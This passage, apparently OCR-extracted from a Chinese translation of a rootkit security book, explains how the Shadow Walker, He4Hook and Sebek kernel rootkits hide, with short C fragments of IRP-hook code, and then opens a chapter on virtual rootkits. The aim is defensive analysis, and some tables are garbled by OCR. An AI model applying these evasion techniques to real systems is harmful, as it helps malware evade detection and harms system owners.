issue=63&id=8#article) 。 内 存 伪装 的 目标 一 般 是 隐藏 Rootkit 自 己 的 代码 或 者 其 他 一 些 模块 。 我 们 将 这 种 代码 称 之 为 伪装 代 
码 。 


注意 : 这 个 Rootkit 在 很 大 程度 上 基于 现 有 的 Linux 栈 溢出 保护 产品 PaX (https://pax.erssecurity.net/) 和 Joanna Rutkowska 发 表 
的 研究 成 果 。 


这 种 骗术 通过 区 分 伪装 代码 的 执行 请 求 (最 有 可 能 由 需要 运行 自身 代码 的 Rootkit 初 始 化 ) 和 伪装 代码 的 读 / 写 请 求 (由 
Rootkit 检 测 程序 初始 化 ) 来 完成 。 因 此 ，Shadow Walker 的 目标 是 “欺骗 ”扫描 内 存 查找 Rootkit 代 码 的 检测 程序 ， 同 时 仍然 
允许 Rootkit 执 行 。 


和 许多 更 高 级 的 Rootkit 技 术 一 样 ， 这 种 技术 基于 底层 处 理 器 的 结构 性 特点 。 这 样 ，Shadow Walker 能 够 利用 奔腾 处 理 器 缓 
冲 页 面 映射 方法 的 一 个 同步 问题 来 区 分 内 存 读 / 写 操作 和 执行 操作 。 页 面 映射 是 处 理 器 将 虚拟 地 址 映射 到 物理 地 址 的 方式 。 


x86 汇 编 指令 由 指令 (例如 ， 发 出 中 断 的 INT) 和 数据 (指令 所 带 的 操作 数 ) 组 成 。 为 了 节约 对 内 存 的 存 取 ， 处 理 器 将 最 近 
使 用 的 指令 和 数据 存储 到 两 个 并 行 的 缓冲 结构 中 (一 个 比 系统 RAM 速 度 更 快 的 特殊 存储 位 置 ) ， 这 两 个 结构 称 为 快速 重 编 址 缓 
冲 器 (translation lookaside buffers， 也 就 是 指令 快速 重 编 址 缓冲 器 (ITLB) 和 数据 快速 重 编 址 缓冲 器 (DTLB) ) 。 这 种 并 行 
的 指令 和 数据 缓冲 组 织 形 式 称 为 分 离 式 TLB (Split TLB) 。 


每 当 CPU 必 须 执 行 一 个 指令 数据 对 时 ， 它 必须 耗费 很 多 处 理 开销 来 查询 页 面 表 目录 ， 以 得 到 虚拟 地 址 ， 然 后 计算 RAM 中 给 
定数 据 的 物理 地 址 。 如 果 仅仅 查询 ITLB 中 最 近 使 用 的 指令 和 DTLB 中 最 近 使 用 的 数据 (操作 数 ) ， 那 么 这 一 步骤 的 时 间 就 可 以 节 
省 下 来 。 处 理 器 为 同步 这 两 个 缓冲 器 以 及 保持 相同 的 虚拟 到 物理 地 址 映射 的 开销 很 少 。 


那么 Shadow Walker 如 何 使 用 这 个 分 离 式 TLB 体 系 结构 来 区 分 内 存 访问 请 求 呢 7 简 而 言 之 ， 它 强制 刷新 指令 缓冲 但 是 不 影 
响 数据 缓冲 ， 这 样 缓冲 就 不 同步 并 且 对 于 指定 页 面 的 相同 虚拟 到 物理 映射 所 保持 的 值 不 同 。 这 样 ， 尝 试 读 取 伪 装 的 内 人 存 页 面 的 
Rootkit 检 测 程序 实际 上 取 回 的 是 垃圾 (或 者 是 一 些 表 示 “ 没 有 Rootkit! ”的 数据 ) ， 因 为 它们 将 要 读 取 数 据 TLB， 而 Rootkit 本 
身 试 图 在 受 保护 的 内 存 页 面 执行 代码 ， 它 读 取 的 是 指令 TLB， 所 以 可 以 进行 。 


在 两 个 TLB 中 存放 不 同 的 内 容 以 完成 这 些 “ 相 同 物理 页 面 的 不 同 视图 ”的 逻辑 位 于 一 个 定制 的 错误 处 理 程 序 中 。 为 了 局 动 这 
个 错误 处 理 程序 从 而 控制 受 保护 的 内 存 页 面 (也 就 是 Rootkit 代 码 ) 的 访问 权 ，Shadow Walker 刷 新 它 所 希望 过 滤 访 问 权 限 (也 
就 是 隐藏 ) 的 内 存 页 面 的 指令 TLB 项 目 。 这 实际 上 强制 任何 请 求 经 历 一 次 定制 的 页 面 错 误 。 


Shadow Walker 由 两 个 内 核 驱 动 程序 实现 : mmhook.sys 进 行 分 离 式 TLB 欺 骗 ; 稍 作 修改 的 驱动 程序 msdirectx.sys 保 存 FU 
Rootkit 的 核心 。mmhook 驱 动 程序 挂钩 NTOSKRNL.EXE 内 部 的 中 断 调度 表 (IDT) 。 这 个 驱动 程序 安装 对 使 这 种 技术 有 效 很 关 
键 的 自 定义 异常 处 理 程序 (1DT 项 目 0x0E) 。 没 有 使 用 用 户 模式 控制 器 程序 ， 所 以 你 必须 使 用 InstDrv 或 者 其 他 装 入 程序 来 将 驱 
动 程序 放 入 内 核 空间 (首先 装 入 msdirectx.sys， 然 后 装 入 mmhook.sys) 。 装 入 这 些 驱 动 程序 以 后 ， 它 们 负责 余下 的 工作 ， 在 
1DT 中 安装 异常 处 理 程序 ， 这 样 在 页 面 错误 发 生 时 Rootkit 自 动 启动 。 


你 可 以 党 试 访问 msdirectx.sys 驱 动 程序 的 内 存 地 址 来 看 看 这 种 技术 的 工作 状况 。 你 应 该 会 得 到 垃圾 一 一 这 意味 着 mmhook 
驱动 程序 正在 侵害 内 存 视图 。 为 了 测试 ， 必 须 使 用 类 似 DeviceTree 的 工具 查找 misdirectx.sys 的 基地 址 。 在 图 4-8 显 示 的 
DeviceTree 截 图 中 ， 你 可 能 注意 到 msdirectx 驱 动 程序 有 些 奇 怪 : 没有 任何 受到 支持 的 主 功能 代码 或 者 入 口 点 ， 也 没有 设备 连接 
到 它 (所 有 其 他 驱动 程序 都 有 ) ! 确实 如 此 ? 一 定 发 生 了 什么 事情 。 


使 用 WinHex (或 者 能 够 读 取 任意 物理 内 存 的 类 似 工具 ， 如 Sysinternals PhysMem) ， 通 过 对 任何 来 自 二 进 制 文件 
msdirectx.sys 中 的 字 节 序列 进行 内 存 字 节 模式 搜索 ， 你 可 以 验证 FU Rootkit 的 内 存 页 面 被 mmhook 驱 动 程序 隐藏 。 可 以 在 装 入 
驱动 程序 之 前 或 者 之 后 进行 这 项 验证 。 在 装 入 mmhook 之 前 ， 应 该 能 在 物理 内 存 中 找到 这 些 特 征 码 (也 就 是 Rootkit 代 码 ) ， 但 
是 ， 装 入 驱动 程序 之 后 ， 应 该 找 不 到 这 些 代 码 。 


Shadow Walker 是 概念 验证 性 Rootkit 的 又 一 个 例子 ， 它 说 明 一 种 技术 并 且 不 试图 隐藏 自己 。 它 也 不 支持 主流 的 体系 结构 特 
性 ， 例 如 多 处 理 器 、PAE 或 者 可 变 页 面 尺寸 。 这 个 Rootkit 的 最 大 局 限 性 可 能 是 对 希望 使 用 这 个 技术 隐藏 自身 的 驱动 程序 所 强加 
的 限制 性 要 求 ， 与 这 个 Rootkit 一 起 发 布 的 readme 文 件 说 明了 驱动 程序 所 必须 遵循 的 一 个 “协议 ”， 例 如 ， 为 了 隐藏 人 工 提升 / 
降低 中 断 请 求 级 别 (IRQL) 、 刷 新 TLB 以 及 其 他 情报 搜集 工作 。 但 是 ， 这 个 Rootkit 是 使 用 非常 低级 别 硬件 设备 的 高 级 Rootkit 的 
绝 佳 范例 。 
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图 4-8 DeviceTree 显 示 msdirectx 出 了 问题 


45.5 ”He4Team 创 建 的 He4Hook 


技术 : IRP 


尽管 He4Hook 项 目 己 于 2002 年 被 其 作者 放弃 ， 但 是 仍然 有 许多 可 用 的 He4Hook 版 本 
(http://he4dev.e1.bmstu.ru/HookSysCall/) ， 每 个 版 本 都 有 不 同 水 平 的 功能 。 本 质 上 ， 上 所 有 版 本 都 使 用 SSDT 修 改 或 者 IRP 
钩子 来 隐藏 文件 、 驱 动 程序 和 注册 表 项 目 。 大 部 分 版 本 采用 Windows 文 件 系 统 驱动 程序 ntfs.sys 和 fastfat.sys 上 的 IRP 钩 子 ， 履 
盖 了 所 有 驱动 程序 和 连接 到 文件 系统 驱动 程序 设备 的 主要 功能 表 的 以 下 项 目 : 


- IRP_MJ_CREATE 
- IRP_MJ_CREATE_NAMED_PIPE 


- IRP_MJ_CREATE_MAILSLOT 





- IRP_MJ_DIRECTORY_CONTROL 


He4Hook 用 指向 Rootkit 函 数 的 指针 蔡 换 指向 真实 ODS 函数 的 指针 。 它 还 替换 了 驱动 程序 的 卸载 例 程 。 这 个 Rootkit 直 接 修改 
内 存 中 的 DRIVER_OBJECT 并 且 蔡 换 必 要 的 指针 来 完成 这 项 工作 。 


He4Hook Rootkit 驱 动 程序 装 入 之 后 ， 它 使 用 Windows APIR ZwOpenDirectory-Object () 在 系统 线程 队列 中 插入 一 
个 线程 来 扫描 目录 对 象 \Drivers and\\FileSystem, XSF (使 用 一 个 未 写 入 文档 的 Windows API 函 数 


ZwQueryDirectoryObject () ) 从 这 些 列表 中 读 取 的 每 个 驱动 程序 文件 ， 它 使 用 一 个 未 写 入 文档 的 输出 Windows 内 核 函 数 
ObReference-ObjectByName () 来 取得 指向 驱动 程序 的 DRIVER_OBJECT 的 指针 。 读 取 这 一 指针 之 后 ，Rootkit 检 查 该 驱动 程 
序 的 设备 栈 ， 枚 举 所 有 设备 ， 确 保 其 DEVICE_OBJECT 是 适合 挂钩 的 设备 类 型 (也 就 是 文件 系统 相关 设备 ) 。 
DriverObjectHook.C 的 代码 如 下 : 


pDeviceObject = pDriverObject->DeviceObject; 
while (pDeviceObject) { 


if (IsRightDeviceTypeForFunc (pDeviceObject->DeviceType, IRP MJ CREATE) == TRUE) { 
TopDeviceObject = pDeviceObject; 
do { 
if (IsRightDeviceTypeForFunc (TopDeviceObject->DeviceType, IRP MJ CREATE) == TRUE) { 


pTargetDriverObject = TopDeviceObject->DriverObject; 
for (i = 0; i <= IRP MJ MAXIMUM FUNCTION; ++i) { 


if (pTargetDriverObject->MajorFunction[i] != NULL) { 
if (pTargetDriverObject->MajorFunction[i] != DriverObjectDispatch) { 
AddHookedDriverIntoTree (pTargetDriverObject) ; 
} 
break; 
} 
} 
} 
if (TopDeviceObject->AttachedDevice == NULL) 
break; 


TopDeviceObject = TopDeviceObject->AttachedDevice; 


} 


while (1); 


pDeviceObject = pDeviceObject->NextDevice; 


} 


代码 中 最 重要 的 部 分 都 加 粗 显 示 。 这 个 FOR 循环 枚 举 给 定 的 驱动 程序 和 设备 的 所 有 可 能 的 IRP 主 功能 代码 ， 如 果 驱 动 程序 中 
有 对 应 的 调度 函数 ， 该 Rootkit 用 自己 的 调度 例 程 DriverObjectDispatch () 蔡 换 这 个 函数 指针 。 这 是 IRP 钩 子 的 定义 。 注 意 这 
个 Rootkit 是 如 何 确定 这 些 国 数 还 未 被 挂钩 的 。 


这 样 ，Rootkit 已 经 成 功 地 将 各 个 驱动 程序 的 IRP 中 预定 的 调度 函数 重 定向 到 自己 的 调度 冰 数 。 很 好 ， 现 在 每 微 秒 都 能 收 到 所 
有 类 型 的 设备 (从 网 络 命名 管道 到 符号 链接 ) 的 数 百 个 IRP。 为 了 在 噪声 中 找到 主旋律 ，Rootkit 在 其 调度 阔 数 中 过 滤 这 些 IRP。 


我 们 来 更 仔细 地 看 看 调度 函数 的 源 代 码 ， 研 究 一 下 He4Hook 是 如 何 利用 IRP 钩 子 ， 挂 钧 JRP_MJ_DIRECTORY_CONTROL 来 
隐藏 文件 的 。 记 住 ，Rootkit 使 用 的 这 个 函数 是 一 个 IRP 调 度 函 数 ， 所 以 每 当 一 个 请 求 〈 例 如 文件 读 请 求 ) 发 出 ， 这 个 函数 就 能 检 
查 产 生 的 IRP。Rootkit 已 经 挂钩 了 必要 的 IRP; 调度 函数 是 它 利 用 这 些 IRP 做 些 事情 (如 隐藏 文件 ) 的 场所 。 


这 个 函数 的 头 70 行 建立 数据 结构 ， 确 定 希 望 过 滤 的 IRP。 这 通过 验证 IRP 的 主 功能 代码 是 否 为 Rootkit 所 关心 的 4 种 代码 ， 以 
及 设备 类 型 是 否 合适 (如 CD-ROM、 磁 盘 等 ) 来 完成 : 


if ( (dwMajorFunction == IRP MJ SHUTDOWN) || (bIrpAlreadyTreat == FALSE) && 
(bIsRightDeviceType == TRUE) && ((dwMajorFunction >= IRP_MJ_CREATE && 
dwMajorFunction <= IRP MJ CREATE NAMED PIPE) | | 
(dwMajorFunction == IRP MJ CREATE MAILSLOT) 
#ifdef HOOK QUERY DIRECTORY IRP || ( 
dwMajorFunction == IRP MJ DIRECTORY CONTROL ) 
#endif)) 


如 果 所 有 条 件 都 符合 ，Rootkit 从 IRP 复 制 一 些 感 兴趣 的 数据 (例如 ， 请 求 创建 、 读 取 、 删 除 等 操作 的 文件 名 称 ) 并 且 调 用 两 
个 函数 TreatmentlrpThread () 和 Treatment-Query-DirectoryIRP () (或 者 用 于 其 他 所 有 主要 功能 能 


TreatmentCreateObjectIRP () ) 。 这 两 个 函数 在 Rootkit 将 IRP 传 递 给 驱动 程序 栈 中 的 下 一 个 驱动 程序 之 前 对 其 进行 修改 。 为 
了 隐藏 文件 ， 调 度 例 程 只 要 从 产生 的 IRP 中 删除 目录 信息 ， 当 其 他 驱动 程序 接收 到 该 IRP 时 ， 信 息 就 丢失 了 。 因 此 ， 每 当 程 序 调 
用 NtQueryDirectoryFile () 或 者 其 他 依赖 文件 系统 驱动 程序 的 API 时 ， 这 些 函 数 都 不 会 返回 配置 为 隐藏 的 文件 。 


He4Hook 使 用 的 技术 依赖 一 些 可 能 在 最 近 版 本 的 Windows 中 不 存在 的 未 写 入 文档 的 图 数 。 因 为 这 些 函 数 未 写 入 文档 ， 所 以 
不 能 保证 在 不 同 的 补丁 和 主 发 行 版 本 中 还 会 存在 。 而 且 ， 大 部 分 的 He4Hook 版 本 在 除 IRP 钩 子 之 外 还 实施 内 核 函 数 钩子 ， 可 能 被 
扫描 SSDT 的 工具 轻易 地 发 现 。 


He4Hook 是 一 个 注重 细节 的 相当 成 熟 的 Rootkit， 这 使 其 具有 非常 高 的 隐蔽 性 。 它 的 恶意 特性 在 整个 源 代码 中 对 未 写 入 文档 
函数 的 使 用 (在 一 个 令 人 印象 深刻 的 ， 仅 有 38kB 的 小 型 头 文件 NtoskrnIUndoc.h 中 ) 和 猜 独 的 指针 重新 赋值 中 显露 无 遗 。 它 还 
大 量 使 用 预 处 理 指令 将 某 些 代 码 段 排除 于 编译 之 外 。 那 样 ， 如 果 Rootkit 用 户 不 想 要 某 个 功能 ， 该 功能 就 不 会 出 现在 所 产生 的 驱 
动 程序 中 ， 这 就 使 得 所 产生 的 驱动 程序 中 的 可 疑 代 码 最 小 化 。 


He4Hook 最 隐蔽 的 特性 可 能 是 其 装 入 驱动 程序 的 方法 。 所 有 Windows 驱 动 程序 必须 实现 函数 DriverEntry () ， 这 个 函数 
代表 驱动 程序 装 入 时 的 入 口 点 。 所 有 正常 的 驱动 程序 初始 化 必要 的 管理 结构 并 且 填 写 驱动 程序 的 主 功能 表 。 然 而 ，He4Hook 在 
其 DriverEntry () 例 程 内 部 调用 一 个 函数 InstallDriver () 。 这 个 函数 提取 内 存 中 其 映像 基地 址 预定 偏 移 量 的 驱动 程序 二 进 制 代 
码 ， 分 配 一 些 未 分 页 的 核心 内 存 池 ， 并 且 将 驱动 程序 复制 到 这 个 缓冲 区 ， 然 后 调用 一 个 定制 函数 获得 一 个 未 输出 的 内 部 函数 地 
址 ， 这 个 函数 在 此 之 后 调用 “真正 的 ”DriverEntry () 例 程 。 


dwFunctionAddr = (DRIVER_ENTRY) NativeGetProcAddress ( (DWORD) pNewDriver- 
Place, " InvisibleDriverEntry@8") ; 
if (!dwFunctionAddr) { 
ExFreePool (pNewDriverPlace) ; 
return FALSE; 


} 


NtStatus = dwFunctionAddr (DriverObject, RegistryPath) ; 


未 输出 的 函数 “InvisibleDriverEntry 是 InstallDriver () 中 实际 的 DriverEntry () 例 程 ， 在 将 其 指针 赋值 给 
dwFunctionAddr 后 理解 调用 。 这 种 技术 有 两 个 主要 的 好 处 : (1) 驱动 程序 不 由 服务 控制 管理 器 (SCM) 装 入 ， 因 此 不 存在 磁 
盘 或 者 注册 表 上 的 痕迹 。 (2) 函数 重 定向 帮助 掩盖 其 真正 的 功能 ， 而 不 是 在 众所周知 的 驱动 程序 (如 DriverEntry () ) 中 那样 
广 而 告 之 。 


4.5.6 ”Honeynet 项 目 创建 的 Sebek 


技术 : IRP 钧 子 ，SSDT 钩 子 ， 过 滤器 /分 层 驱 动 程序 以 及 DKOM 


有 一 点 不 得 不 提 ， 并 不 是 所 有 内 核 模 式 的 Rootkit 都 是 为 了 “罪恶 ”或 者 政 意 的 目的 而 编写 的 。Sebek 由 本 书 作 者 之 一 
Michael A.Davis 为 Honeynet 项 目 编写 ， 是 一 个 使 用 与 恶意 Rootkit 相 同 技术 的 内 核 模 式 Rootkit， 帮 助 分 析 、 检 测 和 捕捉 进入 密 
钠 的 攻击 者 信息 。Sebek 使 用 了 各 种 技术 来 避免 攻击 者 发 现 ， 并 且 确 保 能 够 将 捕捉 到 的 信息 以 秘密 的 方式 发 送 给 远程 的 Sebek 服 
务 器 。 


因为 Honeynet 项 目的 目标 是 “学 习 计算 机 和 网 络 攻 击 所 涉及 的 工具 、 策 略 和 动机 ， 并 分 享 所 得 到 的 教训 |”，Sebek 用 来 监 
控 和 捕捉 攻击 者 进入 Windows 系 统 之 后 的 击 键 和 执行 的 功能 。 监 控 所 有 Windows 的 必要 部 分 来 获得 这 些 信息 暴露 了 一 个 有 趣 的 
间 题 。 已 经 存在 的 主流 击 键 记录 程序 的 工作 方式 是 挂钩 键盘 并 且 使 用 本 章 前 面谈 到 的 方法 。 但 是 这 些 方法 很 容易 被 发 现 ， 对 攻击 
者 保持 隐蔽 性 很 重要 ， 因 为 我 们 不 希望 测试 的 目标 (攻击 者 ) 由 于 知道 了 自己 被 监视 而 改变 其 行为 。 所 以 ， 我 们 决定 使 用 和 其 他 


内 核 Rootkit 相 同 的 技术 (具体 地 说 就 是 SSDT 钩 子 和 过 滤器 驱动 程序 ) EAR PSUR, LEMAR. MAAR 
所 有 发 送 给 基于 控制 台 的 应 用 程序 的 命令 和 击 键 。 


当 Sebek 第 一 次 发 行 时 ， 没 有 引起 任何 人 的 注意 ， 但 是 自从 该 工具 的 源 代码 可 以 免费 取得 之 后 ， 其 他 人 开始 在 自己 的 项 目 中 
利用 这 些 代 码 。Rootkits.com 上 张贴 了 消息 ， 最 新 版 本 的 Sebek for Windows 添 加 了 新 的 功能 ， 包 括 监视 和 挂钩 所 有 入 站 和 出 
站 TCP/IP 连 接 以 及 更 多 的 GUI 钩子 。Sebek 收 集 的 信息 对 于 分 析 进 入 基于 Windows 的 密 缸 的 攻击 者 已 经 没有 价值 了 。 令 人 难过 
地 是 ， 由 于 社区 对 此 缺乏 兴趣 以 及 作者 缺乏 时 间 ，sebek for Windows 已 经 多 年 没有 更 新 了 。 


Sebek 不 是 唯一 的 “友好 ”Rootkit。 许 多 击 键 记 录 程 序 、 数 据 记 录 程 序 甚 全 防 恶意 软件 和 防 病毒 软件 都 采用 内 核 模式 
Rootkit 来 保持 隐蔽 和 检测 恶意 软件 。 好 人 使 用 同样 的 工具 和 技术 ， 这 就 是 工具 、 驱 动 程序 和 软件 成 为 恶意 软件 的 主因 的 一 个 重 
要 范例 。 这 是 每 一 个 主流 安全 型 供应 商 所 面 对 的 问题 ， 我 们 将 在 第 7 章 讨论 防 病毒 业界 及 其 对 Rootkit 和 恶意 软件 的 回应 时 进一步 


研究 这 个 问题 。 
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内 核 模式 Rootkit 技 术 从 根本 上 基于 复杂 的 指令 集体 系 结构 和 Windows OSs 所 基于 的 内 核 模 式 体 系 结构 。 仪 仅 理 解 和 考虑 这 
些 技术 的 大 量 细节 ， 对 于 防 Rootkit 的 领导 者 来 说 就 是 难以 完成 的 任务 。 内 核 模式 始终 会 有 一 个 后 门 ， 这 是 因为 Windows OS 设 
计 和 实现 的 巨大 复杂 性 。 


内 核 模式 Rootkit 是 当今 最 先进 和 最 有 持续 性 的 网 络 威胁 。 它 们 继续 成 为 基本 系统 保障 的 可 怕 对 手 ， 并 且 远 远 领先 于 商业 的 
防 病毒 软件 和 HIPS 产 品 。 


本 章 的 最 后 展示 了 内 核 模式 Rootkit 的 一 些 例子 ， 透 彻 地 说 明了 本 书 第 一 部 分 讨论 的 技术 。 我 们 要 向 读者 强调 ， 这 只 是 一 小 
部 分 例子 ， 而 且 仅 包括 已 经 广为人知 并 且 经 过 研究 的 Rootkit。 更 高 级 的 Rootkit 当 然 还 存在 于 未 公开 的 其 他 空间 内 。 这 甚至 包括 
比 操作 系统 更 深 的 系统 ， 如 固件 和 BIOS 级 别 的 Rootkit。 而 且 ， 由 单独 工具 使 用 的 技术 也 开始 集合 在 一 起 ， 这 样 单个 Rootkit 最 
终 会 利用 越 来 越 多 的 钩子 方法 来 减少 曝光 的 可 能 性 。 


最 后 ， 并 不 是 所 有 内 核 模式 Rootkit 都 是 魔鬼 ! 我 们 了 解 到 ， 其 他 工具 如 sebek、 防 病毒 软件 和 集团 公司 使 用 的 企业 级 击 键 
记录 程序 都 采用 了 和 恶意 的 内 核 Rootkit 相 同 的 “控制 ”技术 来 发 现 Rootkit。 


对 策 小 结 


现在 广泛 得 到 接受 的 恶意 软件 分 级 系统 是 由 业界 公认 的 研究 人 员 Joanna Rutkowska 在 Black Hat Europe2006 会 议 上 提出 
AY (http://www.blackhat.com/presentations/bh-europe-06/bh-eu-06-Rutkowska.pdf) ， 包 括 4 种 类 型 的 恶意 软件 : 


. 0 类 ”不 修改 操作 系统 或 者 其 他 进程 的 恶意 软件 。 

` | 类 ”修改 被 批准 修改 的 系统 代码 (也 就 是 操作 系统 本 身 、CPU 寄 存 器 等 ) 之 外 的 ， 不 应 该 被 修改 的 内 容 的 恶意 软件 。 
` ll 类 ”修改 设计 为 可 修改 的 内 容 (例如 ， 二 进 制 文件 中 数据 段 内 的 自修 改 代码 ) 的 恶意 软件 。 

` lll 类 ”可 以 不 做 任何 修改 就 破坏 操作 系统 的 虚拟 Rootkit。 


为 了 与 这 些 恶 意 软件 做 斗争 ，Joanna 推 荐 了 多 种 可 用 的 方法 和 工具 ， 以 及 恶意 软件 实例 。 下 表 详 细 列 出 了 这 些 对 策 。 






常规 的 破坏 一 一 注册 表 键 . _ Botnets, MySearchBar, Netsky , 
m e 
Man es 防 病毒 、 防 垃圾 邮件 和 防 间谍 软件 
值 修改 ， 不 需要 的 间谍 软件 | PURE. EAEE | yy sett 


修改 不 应 该 动态 修改 的 操 eee 
be bed 使 用 程序 二 进 制 代 码 特 征 码 ， 验 证 程 i 
Se 作 系 统 结构 (例如 SSDT); |、 -  、，， Sg N ls Hacker Defender, Shadow Walker 
I 类 fb ve pe Z 4 ate | 序 和 文件 的 内 存 版 本 和 磁盘 版 本 : svv, 
可 能 造成 系统 不 稳定 ， 并 且 - . 和 Adore, AFX 
PatchGuard, Vice, SDT Restore 













隐蔽 地 监控 和 窃取 信息 
修改 运行 时 由 操作 系统 或 
WH | 者 运行 中 的 进程 修改 的 动态 | ”监视 可 能 被 修改 的 所 有 关键 数据 结构 
结构 〈 例 如， 程序 的 数据 段 ) 


Deepdoor, Fu, FuTo, Klog 和 
He4Hook 


寻找 Rootkit 的 副作用 ， 例如， 虚拟 
理 程序 的 虚拟 Rootkit， 具 有 | 、 Eaa | ak A ‘ | 
III 类 ve 进程 和 设备 、 定 时 攻击 以 及 CPU 特殊 | BluePill 和 SubVirt 
OS 的 完全 控制 权 ， 而 且 不 指令 的 使 用 
AO HJE 


为 OS 所 知 


第 5 章 ”虚拟 Rootkit 


虚拟 计算 (又 称 为 虚拟 化 ) 是 模拟 真实 计算 系统 或 者 像 后 者 一 样 运作 的 计算 环境 ， 这 也 是 虚拟 机 或 者 虚拟 系统 名 称 的 由 来 。 
今天 ， 大 部 分 企业 已 经 转向 虚拟 化 ， 因 为 这 种 技术 使 系统 更 加 敏捷 ， 管 理 更 简单 。 中 小 企业 还 发 现 ， 虚 拟 化 比 传统 的 基于 硬件 计 
算 机 系统 更 为 经 济 ， 可 以 降低 运营 成 本 。 连 家 庭 用户 ( 像 我 自己 ) 也 将 虚拟 化 用 于 自己 的 计算 需求 。 


越 来 越 多 的 企业 和 个 人 采用 虚拟 化 技术 ， 使 其 成 为 攻击 者 的 主要 目标 。 现 代 和 恶意 软件 并 没有 因为 害怕 虚拟 系统 是 设计 用 于 分 
析 它 们 的 测试 机 器 而 躲避 ， 而 是 进行 额外 的 检查 ， 以 确定 虚拟 环境 是 不 是 测试 机 器 。 如 果 是 ， 则 恶意 软件 简单 地 停止 执行 并 删除 
自己 ; 否则 ， 恶 意 软件 继续 执行 自己 的 指令 。 


在 虚拟 化 技术 或 者 虚拟 化 系统 中 生存 的 现代 恶意 软件 称 为 “虚拟 Rootkit 恶 意 软 件 ”， 或 者 简称 为 虚拟 Rootkit。 虚 拟 
Rootkit 代 表 着 尖端 的 Rootkit 技 术 。 虚 拟 化 的 硬件 和 软件 支持 在 近年 来 已 经 迅猛 地 增强 了 ， 为 全 新 的 Rootkit 攻 击 方向 铺 平 了 道 
路 。 实 现 虚拟 化 的 技术 机 制 也 为 以 过 去 不 可 能 的 隐蔽 方法 造成 破坏 提供 了 文 持 。 更 糟 的 是 ， 虚 拟 技术 可 能 极其 复杂 和 难以 理解 ， 
这 为 有 关 这 种 威胁 的 用 户 培训 带 来 了 挑战 。 可 以 说 ， 虚 拟 化 技术 当前 的 状态 是 一 次 完美 风暴 。 


为 了 更 好 地 理解 虚拟 Rootkit 的 威胁 ， 我 们 将 介绍 虚拟 技术 工作 原理 的 大 量 技术 细节 中 的 一 些 内 容 ， 以 及 虚拟 技术 所 针对 的 
最 重要 部 分 。 这 些 主题 包括 虚拟 化 策略 、 虚 拟 内 存 管理 以 及 系统 管理 程序 。 在 介绍 这 些 技 术 细节 之 后 ， 我 们 将 讨论 各 种 虚拟 
Rootkit 技 术 ， 例 如 ， 离 开 虚 拟 环境 甚至 劫持 系统 管理 程序 。 在 本 章 最 后 ， 我 们 将 深入 分 析 3 种 当前 有 名 的 虚拟 Rootkit: 
SubVirt, Blue Pil 和 Vitriol。 


5.1 “虚拟 机 技术 概述 


虚拟 技术 重新 定义 了 现代 的 服务 器 和 工作 站 计算 。 虚 拟 化 使 单个 计算 机 能 够 在 多 个 同时 执行 的 操作 系统 之 间 共 享 资源 。 在 虚 
拟 化 出 现 之 前 ,一 台 计 算 机 被 限制 为 只 能 同时 运行 一 个 操作 系统 实例 (除非 将 大 型 机 作为 虚拟 化 的 第 一 个 实例 ) 。 这 种 限制 是 对 
资源 的 浪费 ， 因 为 底层 的 体系 结构 能 够 同时 支持 多 个 操作 系统 实例 。 这 种 并 行 处 理 和 资源 共享 的 一 个 明显 好 处 是 在 服务 器 环境 

(如 Web 和 文件 服务 器 ) 中 提供 了 高 生产 率 。 因 为 系统 管理 员 现在 可 以 在 一 台 计 算 机 上 运行 多 个 Web 服 务 器 ， 可 以 使 用 更 少 的 


资源 来 完成 更 多 的 工作 。 虚 拟 化 市 场 还 扩展 到 单 用 户 的 个 人 计算 机 ， 使 它们 能 够 在 多 种 不 同类 型 的 操作 系统 (Linux、OSX 等 ) 
中 完成 多 种 任务 。 图 5-1 说 明了 系统 资源 虚拟 化 以 运行 多 个 操作 系统 的 概念 。 

有 两 种 得 到 广泛 接受 的 虚拟 机 分 类 : 进程 虚拟 机 和 系统 虚拟 机 (也 称 作 硬 件 虚拟 机 ) 。 我 们 将 对 进程 处 理 器 做 简单 的 介绍 ， 
而 主要 关注 于 系统 虚拟 机 。 


Pras 
Gee ee ee a N a S 


assmmnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnmsss 
. . 
. 


虚拟 机 1 “站 虚拟 机 ho 六 虚拟 机 3 
( Linux ) : : ( Windows ) : : ( Mac OS ) 


ee 
. . 
* 





物理 硬件 


图 5-1 系统 资源 的 虚拟 化 


5.1.1 虚拟 机 类 型 


进程 虚拟 机 也 称 应 用 程序 虚拟 机 ， 一 般 安装 在 一 个 OS 上 并 且 庶 拟 地 支持 一 个 单独 的 进程 。 进 程 虚拟 机 的 一 个 例子 是 Java 虚 
拟 机 和 .NET Framework。 这 种 类 型 的 虚拟 机 (VM) 为 运行 中 的 进程 提供 一 个 执行 环境 (常常 被 称 作 沙 箱 ) ， 代 表 这 个 进程 使 
用 和 管理 系统 资源 。 


进程 虚拟 机 在 设计 上 远 远 简单 于 第 二 种 虚拟 机 技术 的 主要 类 型 一 一 硬件 虚拟 机 。 硬 件 虚拟 机 不 仅 为 单个 进程 提供 执行 环 
境 ， 还 提供 多 个 操作 系统 ( 称 作 客户 操作 系统 ) 同时 使 用 的 低级 硬件 仿真 。 这 意味 着 VM 模拟 x86 体 系 结构 ， 提 供 所 有 预期 的 硬 
件 和 汇编 指令 。 这 种 仿真 或 者 虚拟 可 以 在 “ 裸 金属 ”硬件 〈 即 在 CPU 必 片 上 ) 或 者 当前 运行 的 操作 系统 ( 称 作 主 操作 系统 ) 之 
上 用 软件 来 实现 。 这 种 仿真 的 操纵 者 被 称 为 系统 管理 程序 (hypervisor) ， 或 称 虚 拟 机 管理 器 (virtual machine 


manager, VMM) 。 


5.1.2 ”系统 管理 程序 


系统 管理 程序 (hypervisor) 是 一 个 硬件 虚拟 机 组 件 ， 处 理 所 有 在 主 系 统 上 运行 的 虚拟 机 的 系统 级 虚拟 化 。 它 管理 从 操作 系 
统 资源 到 共享 系统 资源 之 间 的 映射 。 系 统管 理 程序 处 理 系统 资源 共享 、 虚 拟 机 隔离 ， 以 及 所 有 附属 虚拟 机 的 核心 任务 。 系 统 虚 拟 
机 内 部 的 每 个 虚拟 机 运行 一 个 完整 的 操作 系统 ， 例 如 Windows10 或 者 Red Hat Enterprise Linux。 


有 两 种 类 型 的 系统 管理 程序 : | 类 (RE) MIR (托管 ) 。| 类 系统 管理 程序 在 主板 上 的 系统 硬件 中 实现 ， 而 | 类 系统 管理 程 
